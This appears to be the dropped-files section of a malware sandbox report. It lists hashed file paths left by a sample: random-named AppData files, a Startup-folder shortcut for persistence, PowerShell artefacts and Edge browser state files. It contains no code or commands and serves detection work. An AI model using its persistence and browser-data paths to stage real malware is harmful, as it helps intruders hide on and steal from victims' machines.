SHA256 b337c39eb92be90cde12e1cb46e477eb00c712a43b709484f19068f36e832ecd
SHA512 a7e98f235dbe21cd41915ed8ed8e6086c08779a5087a42728f4af4c66ddab45857e4506dd0b609022b65efdbfd6f450a3179c10957b62809432d04c82b448fbd

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\nJUFulGcIPqWAErCMb.nieoFfzLdTqcC

MD5 a2e84a0961429ad19e6b9102890e04d5
SHA1 919b54dce71a306e58af66c8a747cffef0a28efd
SHA256 79f591184a4f78608cb52d7922aaec7c4aa2e7d49846930d7c0575fd566adb3e
SHA512 42b5a4b5188daf5be3b3a2ae956bfa96fbf1ea64506f1d120cc0afef4e477da19bd06e51954e314ad1125492e8040535954bb4e91974cfa83c00e7ad28efb5e3

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\LVEZHQtpFAnoCuTSlW.dDVSrHgWQlucRJsoqE

MD5 262ec5371040ddc2ec8d0b6716e557e7
SHA1 181964dfc4b3c4602133b14eba628fb7f95506e8
SHA256 e5e3de8474df09fa6dc304afb06adf6d7039f6541ed81d1545f73f1aa877c6c4
SHA512 d847aeedc1083dc871964b178b77fe86c89b3538c90af5fbd5e93251462139d0ceebda759a31b983af1d5f9ed79396c12d735bf57d8d324ff4aa5c41bd6169fe

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\fILXCvcorxZk.XmieauGgLARf

MD5 4287b274280f569344dc92d0021cd1a5
SHA1 01682f04417764bfdcb7f7e0e829e95594a210a0
SHA256 32aa07529bae3d134d8b16f8585d47fbeaf1d42c4e9613174965c3a36be6ebbd
SHA512 b5518669243bbbd833289f88ec3f5b6e1c32a23a27d0093fa46330d85f82635b1c79ca913315db5ca46e4c16413ead13412bc30fa3f275eb48172e61848a6548

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\BkSIRPApuOgyoa.mouPvGWRgySHBk

MD5 a3e20a609bd1ace98c18f35b0e01455e
SHA1 ba56c1f03f5e7b366b6e2f6755c375167214347d
SHA256 537f63abb9e3f63ac4eae41d8653b563ead5b5f8c3f037e77a2bdc20f6cde734
SHA512 3b1675a34c88a6a9672bbf349a90a3e2a28b78ae06025de5c28ea31dfaec3d8dfd96d8007e9a75f95de77622be85d2bc11ef256cf853e066a8cc60f6b5399586

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\awiFHCAlvbRIZ.qYwoShgBtAzMON

MD5 264ad4199b6e05ffa8dab2774658dbcb
SHA1 bdad3bc46c5fbb6d672a4ef4f133c1633f90c324
SHA256 6e9428c864f4df7f985b0416d5655b96f153111d3875701672689e5b13e3c225
SHA512 7ee5dd8fc7c4909269bafc770e77961324e12b6d5e41d4e0cd23c30a2ffc4dea7cbc2559667b4c2d7983e41d7f40e6902701fac78038156fd0d36685fd36b37b

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\gzQMZdXYVxuJroTnUAs.ihAIaeMfQPq

MD5 0efdffd7dd1bf6b6d6caf9f8f58fd0d4
SHA1 0c98c97ef0b8f515acaf36b103a7a3ec956b3f5a
SHA256 79a2fe98dd3e32f0d8147e00469b991f7da3471d226ea8d7403f54d08dc948b8
SHA512 fa4f030e6afa8665f0d028cbd1503ae3a756c427d05877b48b81f6754fd809ea946270d169f9e6ff0b2a4d55b2b87b41d863bffacd5ea64ca5790fdc13785ede

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\dlKQhREpxbB.ZWfphvFVIqnka

MD5 0820be4f558a451454279d30c51ed0ef
SHA1 019450abbdbc4aadac6949e79fcd44c8ef45a797
SHA256 a905a66e2a9022d457ace37e0cb7ab4f05efc4f432b2000e0c4ce790f570bdad
SHA512 8f6e6f2145fbcaebcb657f7e5f6c791c1d4c941845663c0dfec20bb7a73f54b4a2efca133c4e4eec9d590203a59f9e590ed4c1f6233940013c4c0318b24f2d28

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\djPVEaswkDbzot.qmzfAFMNQd

MD5 7ba9f5598f352d3369d8b611e23d3015
SHA1 223a25df78b8f30c888e94b9829b3d968253a6da
SHA256 8329e2c33e554558cc69cd5d5d60e3f036261600feb5a60be6a7b588bf7f6ac5
SHA512 ce9a31fdcd4e7b26689fe2f867421c0597665303d6cf4d912f98031de1a8065f435bdfff74dc95d2895c6b7d13989126e1566ca40e4d90ff09da9323e28c55f8

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\QvdwkPpDlFYnVTW.kvCzHWPOTrlEtomRh

MD5 f8659798a4ef065712baca728ebd162b
SHA1 0a977886a6b61bfa65dd64ce18bdb0ab69e0533f
SHA256 1cfa235f157aa961502f623302b39ee40528d63afdfd0ea4e84182e837a98ea7
SHA512 7ffeba64b19dc8b494018cbe9314cbd286bdb1edb4a002c626306bb2b7ae66c60a1a34b48430ceec9a78f968c7bac41583768ac37cd5a03810ae75b2c901da62

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\QvPNSRHdmL.JoaedYHRusA

MD5 f5653d8ca9aa5c69c2fcb39a9164776d
SHA1 c6f8b93be25fc2ed0217c7cb7f737708ecddfa8d
SHA256 2391e54a9227d3b8b93b0dd0f9585c434abdc601a7a813db30d12a076685f1fe
SHA512 16a177155cbcc118c6c380112951ee4d48a21ad4e43c045f4508d632a5d74423e453ac15f5c24d6168bc88a451a7458f18b1ce97612299b15a84695f65e3931c

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\ZBpyduNzbHc.kulbdGsfTxzmHFhBC

MD5 bf434f6a5691c6da0cbc976477a3f68f
SHA1 6a8314d702eac692e28b361373a5233b21e035be
SHA256 fbb7a5b975bf4307d4c211ed2de4188ccf138e6ef37a4d2ea63370b1bcfd2e24
SHA512 f53b9b6b0731c8fb01a4ccbf78be47b587dde48b89c453d22f62f01ce0a7742715c98a3b117d6f5b9ce41c06abda12447f3f0dab0eabff74e953b909241d2d58

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\QuOVnlBRyICWfFNoc.LRUIbKzFyglCpx

MD5 4a3ffa624843d8be1f0083c9d8f66449
SHA1 38854106c7a6c8ef93c7271e57e4e88bce612926
SHA256 f2f383098a30fce19cb0ab4e7ddf89062af6218c2349f0c2113b3f93e9cb4d58
SHA512 2fea2446905a32d59a2c855e0298417e03b2a27f8601f7490187a3f4bfcd5ddb5651c3a8348b15d81669d9d527b2268152507fc3b6e23b18deac8c936af744b3

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\GBmsqgnrVfzJZ.RHCMnQiZhPtU

MD5 4504bb23f603d069b510defc28f4bfdf
SHA1 1ec7d96ba37f94dc5ac9da95431bf2202ec6dcd5
SHA256 139fdcb7278b6bccea45ce6bf22a1d3c11419e9614e13811fc54c6483a284c12
SHA512 e569fe0f3d8135fd3ce99ee66a5f8c2f1ffce61271a2a0de6b0cf88460ec1058818d78cc7e0505809b010d32161a22b8bd81390947bbf786b00436faf2b79af8

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\TEfaiBhdlDpQgt.rQEdutNUvAfw

MD5 aff9576c7297845d485b5374a717ee15
SHA1 9de80a13177bdc863fbde29a064f8860005b97e0
SHA256 e8bb5cc1a18bd05001f4b86db4e22fd2afa28c5a37119d526b0f9f093c63bb8f
SHA512 0de7f632a45c156c777183aaa503387538b0a8a619b3c4889f2cc9c97685465ff5ffd3e73e3694330cadb5a893b3741de9d4c4c490a1a243c230fb668db886a2

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\XyzIlObdRGn.dGhjoysPIRJQ

MD5 6e24954463242114ca1c884cd75873c2
SHA1 f6c6cbf2cc5f17fb7309ec6b5c7efe2c5bdb7e3a
SHA256 4ddcceaa75fc20bdf9aab4114b9505a7c517e31ce74b60cfdf3cbc9f7c50a2fe
SHA512 5e1b523d3a3dbf65ec9f69d0a1d9260c6bba5e1c7684eb602666d987db5cff2e75c12f4f205dce22df329d145769f335206f4b61ecf2bead29f25620e9890a1f

memory/1520-1602-0x0000000005640000-0x000000000565E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\aetFipbGBSNKZzMV.HXGNBCVcUp

MD5 fad42405adc1c3efe63448023bdf2d22
SHA1 fac2265830e09690575d22eecd8ca72f432f40b9
SHA256 7efa7ad3e959a74610c06f47859a18a178d73b7c0fe205ed172da4a344abd1bc
SHA512 b8b0c7ae90123b43dfb18a6b831e5fc072001867272332dbc9499a5d2ceafc5d2235ed34e24a01f719f959fd8a72c1c8e9ee3d6f9a0791547074e56678b7d298

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\zxFqaDicRbWGklP.cBfIAyMCobE

MD5 b01440bdecdf439795c4af224dff6226
SHA1 0d8d84710078748662486d74fd84957215ecbc56
SHA256 c12d089833d1b12edde38645329bea77107a506fd6103d79853554cfec405dd7
SHA512 7ca655a48e3022039c286549705d0111f7b77bf4a3612813097eef1a20f1d250e0504d8b5cfc8fda2cc386b0aa1ddb90428e28f71b4a2bf610cd030809f49ded

C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK

MD5 bde59b00c2d8774541615d29dc31e5ab
SHA1 32013ff1ade5e5724e28d70b7c9d49e32d81699c
SHA256 e73c783024d38f16d9e976cd83649c791b93dcb8b646fececfbe49b239aa8e54
SHA512 d4bbe131478c6f8e407e520388af1b055ea322248e21a040171e7bfc1410e00384398f185be83f88b2b7892e7bc1183a99d185cdc6d9a528756b1f6f5c16d7f3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 0774a05ce5ee4c1af7097353c9296c62
SHA1 658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256 d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512 104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dc1a6f0171e8d38b271148737d3d4745
SHA1 fc678ae118f8e0746ddd26938f8c703ea7b9c324
SHA256 f0b982e06127351129326ac2574b7294a595d20e8c3393242e7b8fa1fcce6055
SHA512 36e0baca112e4076f37ffe4b020aaefd4cd3a6ab207e2d939d02a09c0af88b4bf474a44223c44d2515e777f3822d93658faf568b07f22ca97d4b33c0882848c5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 656f96eba225def0ce0e5f35b7a79832
SHA1 f636f457995843b5a7a5f01e8d9cf81673cc76ce
SHA256 20884e6d83f0081fc30bafce7b9aa8a425d89563d2130441510c9817172ce068
SHA512 442142d7b58693f3c4b8b120018b546f25002021f92f2d7b379c56e9f29fea5466ed250eb9988a925ffb6e73af458199e1f2acfab3c563a9d3f6916994cedf84

C:\Users\Admin\APPDATA\ROAMING\otb3sp5YoAnjQIAldWgWz0nNg6yORVmS6SOKqIcNBFhVzkLeD5FRxFhfDprVA0HiXb3kwOnlT7bnaqDzr_angmHNHLLMHUo9RZQKh1QHxEt7ZWVYa8OCqDbPggxFJoilEQEu7ainxVtF80ijyOmjlFd6kcqDBHiTCve0fxKhqvWDw9

MD5 c0136cb8512630348c95d0b9ac1534c1
SHA1 7eb41f6061399e122ac051af8ddad4e9894e9c40
SHA256 8f8a02d5a80f919ee1c426108a816bc0a70598c8ecd0ab3a7f1892596c1bc973
SHA512 9c13ad8297b7e2a3f55d084c5f503ddf7fcc2ec4bd8f3237e4bfe59f2d777996562638efdd82f01eef648cd2742d36fedb276348aed1b6b18e7518e38f6ab042

C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK

MD5 cf4a1e65e06e85025694fcb4e5953f1c
SHA1 299adbff1892cbfd4e31237f0b6ca0c14bb7c00b
SHA256 b955cee13bae2f358993079821bec51e93799bb8d42028facfd763a91ae42485
SHA512 2275d2d4e5da8f8d9d33897c61b08a730bf7bd4ebb01d6a1f53b58b48f761384ebd7bac9e49825a3b7a2984f8545f568de042814ab96d1d1dfa35388aa4d883c

C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK

MD5 a1c0d90d1f67e6b770308dec6e8c6999
SHA1 8e48e8a124e1ccf743d9bf481055eebf7ccf9106
SHA256 e1e25eb9489f94456f45351d8e1ec172996afcdcb0568b53feedba90d9b79823
SHA512 357cd769cea5550e499485453e1921ae7985afc09d78212bacf33d0b6d75c221fc473aefad2ff8fb2c17f75d7630b0dc58897d3eed6b29a9895f93b7551fe285

C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK

MD5 61f4754133e4e29d534e5306f1a61310
SHA1 8f0d688500332cc79f6d76822fc1a38e039deea8
SHA256 a628bbee663ab1e2367c0988b1c707782ffd462d9e08de5f14db67e37535c931
SHA512 93515852f144e47f52e1c15f1d6cad75d04f71e984830bbab0a2950755e130bbcebf8750ce0644033fa7a4fe0f41f50a11f9e5b1f3be297043eceec829128afa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2a3686c646b4dd4b7fd3a46e12d65083
SHA1 47e371a587ef937f24282cb31453fc8b1612d546
SHA256 a358d10c555db708546facceef329c2faceddbd9be3157d45fea72e32b0264bf
SHA512 2224dadd45c10bd5bff82f2aa5036c3e2fe28d5fe7c2f2e117162afaab0d250924f4f649071d9e280f24618bc169b720997129a6a2bfba5b41491522fd38a8e4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e68eaf8ec323122a0445d4ec4f824a04
SHA1 f9ff92431788e272647cd96f2009d555f5e88109
SHA256 404160a8d579c92e037b3542da60dcd02de6a7b4c0ef3dc4fa2c471bb9690216
SHA512 810df990547b187868ec159e9dc93c675326112e511c025c28f1062372ddabe2abb52ec94fca90148c88ce70c35bacf6fa67fb88c2f66c74c9dfd543718bf134

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cfb75aa9785747ff630760c9cdf9c68d
SHA1 0fa3c93794ba3d016b9db1443a64abbcf68bf274
SHA256 baa84ab58623e64df95cbfa5c6d9c0083abe4cd1d76f2026d8424df12a6dee9b
SHA512 3b9e8b570d0155f5126cb5af31952ff63529ebf44929c14513d073618792f553362f6d57520ad95b8b7d172b613ff5154cd7ebbb0fedd659317382085c8e8887

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

MD5 f942900ff0a10f251d338c612c456948
SHA1 4a283d3c8f3dc491e43c430d97c3489ee7a3d320
SHA256 38b76a54655aff71271a9ad376ac17f20187abd581bf5aced69ccde0fe6e2fd6
SHA512 9b393ce73598ed1997d28ceeddb23491a4d986c337984878ebb0ae06019e30ea77448d375d3d6563c774856d6bc98ee3ca0e0ba88ea5769a451a5e814f6ddb41

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ce2130220e64b60da54ebbd8260a7743
SHA1 d1fb17a38d46602d348f92f07ae18c955580779c
SHA256 8515cd92ea0d20f6d39d836e9323c723bd06d9219530322ea62b32abdf160c61
SHA512 7c658cfcff9a6422b73de074f83b081f283f92a4bde4489d234e793f56f3972e3f6ceeeacc0bf2c298372e5edfb8bac1cc5bf8ce7931eb9a8c96f33c7abde618

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f83d8001b8bbac66733006cf3dce6c7e
SHA1 ece894f87108b004a6edb72bd8d71e369abf0c40
SHA256 a19b84a77028dfd30fe4d8cf40b64ef156cc34f9c8c42c11d6ffb026770a0183
SHA512 c008738d9930e1635207495db7ecab22d3b9beebc07d6135490cd798be3b87f99873ab99eb733c8348f7c75d9ac96295d9761a5ea5ab9d63a3d719297e86c3da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5860c8.TMP

MD5 e646e784af6c570d46d2478a59ce4c74
SHA1 c64861760db645229302e386780052b5cc18c999
SHA256 69d9f236302a7a0ebece1c40ca871600107fb6d8b022ca69342e5e61cc81bc21
SHA512 3a35f5214be2ad173ce4ab39afca4a6eb87c8b99b6f9e7cd5f52d3ec3605d5d2446a331b345b68eeac3b8ec5ac3f6c14bb3829831ff25b3db2b8a0ff57df3539

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7dc80d1b52f1d568d6756f20e3429e34
SHA1 7bd43a6f6b904d32540a50738372630d4a6d9f8c
SHA256 eba69c3c36c07bf558785590861c477d5753c5663da4da5d7b3707a5b48bbaa9
SHA512 13550886a18d720c60f9541b9384a25316a6cb7c7a408b2ed8bdc8957fac7f9590a03304e1a7a0cc57d011aeb19f84275ce3e062aad80a09f4b913211c0ff243

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4e67eb0ffea2bd46e6cefdac15f2d220
SHA1 553e59d0cc0d69a951a20390e45c3ac26e497298
SHA256 30ded989fb0a251142a63e0eceb192b6c5edc4e2acebabacbd2e2803062f0e51
SHA512 e5a9cb707ddad5e74b64706c0429dd1e0e21d569e041353ea8380f7ba039d09e9f35ec70f35885f55d9ed393fd55e24a81d92c1fb529317d7b35a9f1b333135f